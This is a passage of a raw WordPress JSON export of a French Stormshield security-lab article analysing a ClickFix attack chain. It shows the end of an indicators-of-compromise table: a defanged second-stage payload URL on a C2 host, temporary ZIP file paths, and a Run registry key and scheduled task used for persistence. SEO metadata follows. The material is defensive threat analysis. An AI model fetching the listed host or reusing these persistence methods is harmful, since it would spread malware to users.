spellcheck=\"false\">URL<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_57318509\" class=\"td_class_57318509 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 125px; min-width: 125px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_57318509\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_30\" spellcheck=\"false\">C2 n\u00b02<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_99852818\" class=\"td_class_99852818 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 225px; min-width: 225px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_99852818\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_31\" spellcheck=\"false\">https[:]\/\/hailmeinc[.]com\/bkmsiqop[.]zip<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_72808191\" class=\"td_class_72808191 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_72808191\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_32\" spellcheck=\"false\">Fourniture d'un second payload.<\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_3099595\" id=\"tr_id_3099595\" data-draggable=\"true\"><td id=\"td_id_31226560\" class=\"td_class_31226560 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 100px; min-width: 100px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_31226560\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_33\" spellcheck=\"false\">Fichier<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_47736763\" class=\"td_class_47736763 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 125px; min-width: 125px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_47736763\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_34\" spellcheck=\"false\">Payload n\u00b02<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_51732325\" class=\"td_class_51732325 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 225px; min-width: 225px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_51732325\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_35\" spellcheck=\"false\">%TEMP%metvtbg3_zpd_ptred.zip<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_33036093\" class=\"td_class_33036093 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_33036093\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_36\" spellcheck=\"false\">Payload t\u00e9l\u00e9charg\u00e9 sous forme d'archive ZIP.<\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_3315948\" id=\"tr_id_3315948\" data-draggable=\"true\" style=\"background: rgb(255, 255, 255);\"><td id=\"td_id_48413206\" class=\"td_class_48413206 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 100px; min-width: 100px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_48413206\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_37\" spellcheck=\"false\">Fichier<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_59134941\" class=\"td_class_59134941 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 125px; min-width: 125px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_59134941\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_38\" spellcheck=\"false\">Payload n\u00b02<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_57289210\" class=\"td_class_57289210 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 225px; min-width: 225px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_57289210\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_39\" spellcheck=\"false\">%TEMP%metvtbg3_zpd_ptred.zip.tmp<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_10921440\" class=\"td_class_10921440 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_10921440\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_40\" spellcheck=\"false\">Fichier temporaire de t\u00e9l\u00e9chargement du payload n\u00b02.<br>Ce fichier n'est pas supprim\u00e9 si le t\u00e9l\u00e9chargement d\u00e9livre un fichier de moins de 10 KB.<p><\/p><\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_3723077\" id=\"tr_id_3723077\" data-draggable=\"true\"><td id=\"td_id_92794571\" class=\"td_class_92794571 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 100px; min-width: 100px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_92794571\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_41\" spellcheck=\"false\">Registre<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_58854093\" class=\"td_class_58854093 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 125px; min-width: 125px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_58854093\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_42\" spellcheck=\"false\">Persistance payload n\u00b01<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_50162008\" class=\"td_class_50162008 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 225px; min-width: 225px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_50162008\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_43\" spellcheck=\"false\">HKCUSoftwareMicrosoftWindowsCurrentVersionRunivni9_sauqw9_csq_jzdfo<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_23667093\" class=\"td_class_23667093 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_23667093\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_44\" spellcheck=\"false\">Cl\u00e9 registre de d\u00e9marrage du payload \u00e0 l'ouverture de la session de l'utilisateur.<\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_2846872\" id=\"tr_id_2846872\" data-draggable=\"true\" style=\"background: rgb(255, 255, 255);\"><td id=\"td_id_90132986\" class=\"td_class_90132986 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 100px; min-width: 100px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_90132986\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_45\" spellcheck=\"false\">T\u00e2che planifi\u00e9e<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_22148463\" class=\"td_class_22148463 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 125px; min-width: 125px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_22148463\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_46\" spellcheck=\"false\">Persistance payload n\u00b01<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_19121181\" class=\"td_class_19121181 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 225px; min-width: 225px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_19121181\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_47\" spellcheck=\"false\">ivni9_sauqw9_csq_jzdfo<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_88662038\" class=\"td_class_88662038 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_88662038\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item mce-content-body\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2; position: relative;\" id=\"mce_48\" spellcheck=\"false\">T\u00e2che planifi\u00e9e de d\u00e9marrage du payload \u00e0 l'ouverture de la session de l'utilisateur.<\/span><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column][vc_column_text css=\u00a0\u00bb\u00a0\u00bb] Pr\u00e9ambule Dans un pr\u00e9c\u00e9dent article, nous vous avions propos\u00e9 un aper\u00e7u global de la technique ClickFix. Une chaine d&rsquo;attaque exploitant cette m\u00e9thode a \u00e9t\u00e9 d\u00e9tect\u00e9e \u00e0 la mi mars 2026 et mise en lumi\u00e8re sur\u00a0X (anciennement&#8230;<\/p>\n","protected":false},"author":83,"featured_media":774044,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[7065],"tags":[4368],"business_size":[],"industry":[],"help_mefind":[],"features":[],"type_security":[],"maintenance":[],"offer":[],"administration_tools":[],"cloud_offers":[],"listing_product":[],"class_list":["post-773972","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-technical-posts-fr","tag-la-cybersecurite-par-stormshield"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Analyse d&#039;une Cha\u00eene d&#039;Attaque ClickFix - Partie 1<\/title>\n<meta name=\"description\" content=\"D\u00e9cortiquez avec nous la cha\u00eene d&#039;attaque compl\u00e8te ClickFix, de la phase d&#039;acc\u00e8s initial \u00e0 la phase d&#039;ex\u00e9cution.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Analyse d&#039;une Cha\u00eene d&#039;Attaque ClickFix - Partie 1\" \/>\n<meta property=\"og:description\" content=\"D\u00e9cortiquez avec nous la cha\u00eene d&#039;attaque compl\u00e8te ClickFix, de la phase d&#039;acc\u00e8s initial \u00e0 la phase d&#039;ex\u00e9cution.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/\" \/>\n<meta property=\"og:site_name\" content=\"Stormshield\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-23T07:11:28+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-1623819493-scaled.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"2560\" \/>\n\t<meta property=\"og:image:height\" content=\"1707\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Stormshield Customer Security Lab\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@Stormshield\" \/>\n<meta name=\"twitter:site\" content=\"@Stormshield\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Stormshield Customer Security Lab\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"14 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/\"},\"author\":{\"name\":\"Stormshield Customer Security Lab\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#\\\/schema\\\/person\\\/a05f467cec789f90c8a355b178743249\"},\"headline\":\"Analyse d&rsquo;une cha\u00eene d&rsquo;attaque de type ClickFix (partie 1)\",\"datePublished\":\"2026-04-23T07:11:28+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/\"},\"wordCount\":5697,\"image\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.stormshield.com\\\/wp-content\\\/uploads\\\/shutterstock-1623819493-scaled.jpg\",\"keywords\":[\"La cybers\u00e9curit\u00e9 - par Stormshield\"],\"articleSection\":[\"Billets techniques\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/\",\"url\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/\",\"name\":\"Analyse d'une Cha\u00eene d'Attaque ClickFix - Partie 1\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.stormshield.com\\\/wp-content\\\/uploads\\\/shutterstock-1623819493-scaled.jpg\",\"datePublished\":\"2026-04-23T07:11:28+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#\\\/schema\\\/person\\\/a05f467cec789f90c8a355b178743249\"},\"description\":\"D\u00e9cortiquez avec nous la cha\u00eene d'attaque compl\u00e8te ClickFix, de la phase d'acc\u00e8s initial \u00e0 la phase d'ex\u00e9cution.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.stormshield.com\\\/wp-content\\\/uploads\\\/shutterstock-1623819493-scaled.jpg\",\"contentUrl\":\"https:\\\/\\\/www.stormshield.com\\\/wp-content\\\/uploads\\\/shutterstock-1623819493-scaled.jpg\",\"width\":2560,\"height\":1707},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/analyse-chaine-attaque-clickfix-part1\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Analyse d&#8217;une cha\u00eene d&#8217;attaque de type ClickFix (partie 1)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/\",\"name\":\"Stormshield\",\"description\":\"Stormshield\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#\\\/schema\\\/person\\\/a05f467cec789f90c8a355b178743249\",\"name\":\"Stormshield Customer Security Lab\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/46b9416c400398c1a9fc878c7a35bd2ae4f79caeeda138facd5cb65a4ab91c5d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/46b9416c400398c1a9fc878c7a35bd2ae4f79caeeda138facd5cb65a4ab91c5d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/46b9416c400398c1a9fc878c7a35bd2ae4f79caeeda138facd5cb65a4ab91c5d?s=96&d=mm&r=g\",\"caption\":\"Stormshield Customer Security Lab\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Analyse d'une Cha\u00eene d'Attaque ClickFix - Partie 1","description":"D\u00e9cortiquez avec nous la cha\u00eene d'attaque compl\u00e8te ClickFix, de la phase d'acc\u00e8s initial \u00e0 la phase d'ex\u00e9cution.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/","og_locale":"fr_FR","og_type":"article","og_title":"Analyse d'une Cha\u00eene d'Attaque ClickFix - Partie 1","og_description":"D\u00e9cortiquez avec nous la cha\u00eene d'attaque compl\u00e8te ClickFix, de la phase d'acc\u00e8s initial \u00e0 la phase d'ex\u00e9cution.","og_url":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/","og_site_name":"Stormshield","article_published_time":"2026-04-23T07:11:28+00:00","og_image":[{"width":2560,"height":1707,"url":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-1623819493-scaled.jpg","type":"image\/jpeg"}],"author":"Stormshield Customer Security Lab","twitter_card":"summary_large_image","twitter_creator":"@Stormshield","twitter_site":"@Stormshield","twitter_misc":{"\u00c9crit par":"Stormshield Customer Security Lab","Dur\u00e9e de lecture estim\u00e9e":"14 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/#article","isPartOf":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/"},"author":{"name":"Stormshield Customer Security Lab","@id":"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/a05f467cec789f90c8a355b178743249"},"headline":"Analyse d&rsquo;une cha\u00eene d&rsquo;attaque de type ClickFix (partie 1)","datePublished":"2026-04-23T07:11:28+00:00","mainEntityOfPage":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/"},"wordCount":5697,"image":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/#primaryimage"},"thumbnailUrl":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-1623819493-scaled.jpg","keywords":["La cybers\u00e9curit\u00e9 - par Stormshield"],"articleSection":["Billets techniques"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/","url":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/","name":"Analyse d'une Cha\u00eene d'Attaque ClickFix - Partie 1","isPartOf":{"@id":"https:\/\/www.stormshield.com\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/#primaryimage"},"image":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/#primaryimage"},"thumbnailUrl":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-1623819493-scaled.jpg","datePublished":"2026-04-23T07:11:28+00:00","author":{"@id":"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/a05f467cec789f90c8a355b178743249"},"description":"D\u00e9cortiquez avec nous la cha\u00eene d'attaque compl\u00e8te ClickFix, de la phase d'acc\u00e8s initial \u00e0 la phase d'ex\u00e9cution.","breadcrumb":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/#primaryimage","url":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-1623819493-scaled.jpg","contentUrl":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-1623819493-scaled.jpg","width":2560,"height":1707},{"@type":"BreadcrumbList","@id":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.stormshield.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Analyse d&#8217;une cha\u00eene d&#8217;attaque de type ClickFix (partie 1)"}]},{"@type":"WebSite","@id":"https:\/\/www.stormshield.com\/fr\/#website","url":"https:\/\/www.stormshield.com\/fr\/","name":"Stormshield","description":"Stormshield","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.stormshield.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Person","@id":"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/a05f467cec789f90c8a355b178743249","name":"Stormshield Customer Security 